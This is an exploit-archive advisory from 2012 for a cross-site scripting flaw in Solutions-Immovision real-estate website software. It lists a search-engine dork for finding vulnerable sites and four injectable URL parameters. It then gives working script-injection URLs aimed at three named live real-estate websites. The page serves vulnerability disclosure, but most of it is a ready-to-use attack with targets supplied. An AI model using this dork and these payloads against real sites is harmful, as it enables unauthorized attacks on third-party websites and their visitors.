Solutions-Immovision Cross Site Scripting

2012.01.31
Credit: Atmon3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: intext:Powered By Openmedia

+-------------------------------------------------------------------------+ # Exploit Title : Solutions-immovision -All website XSS (Cross Site Scripting) # version : All # Author : Atmon3r # Date : 30/01/2012 # Software Link : http://www.solutions-immovision.com/ # Dork : intext:Powered By Openmedia +-------------------------------------------------------------------------+ [+] Exploits http://localhost/listing.php?langID=[XSS] http://localhost/details.php?lang=[XSS] http://localhost/page.php?lang=[XSS] http://localhost/index.php?lang=[XSS] [+] Demo http://www.smimmobiliernarbonne.com/listing.php?langID=fr/"><script>alert('Xss by Atm0n3r')</script> http://www.sernin-immobilier.com/details.php?lang=fr/"><script>alert('Xss By Atm0n3r')</script> http://www.azur-privilege.com/page.php?src=index-ap.html&lang=fr/"><script>alert('Xss By Atm0n3r')</script> # The End //

References:

http://www.solutions-immovision.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top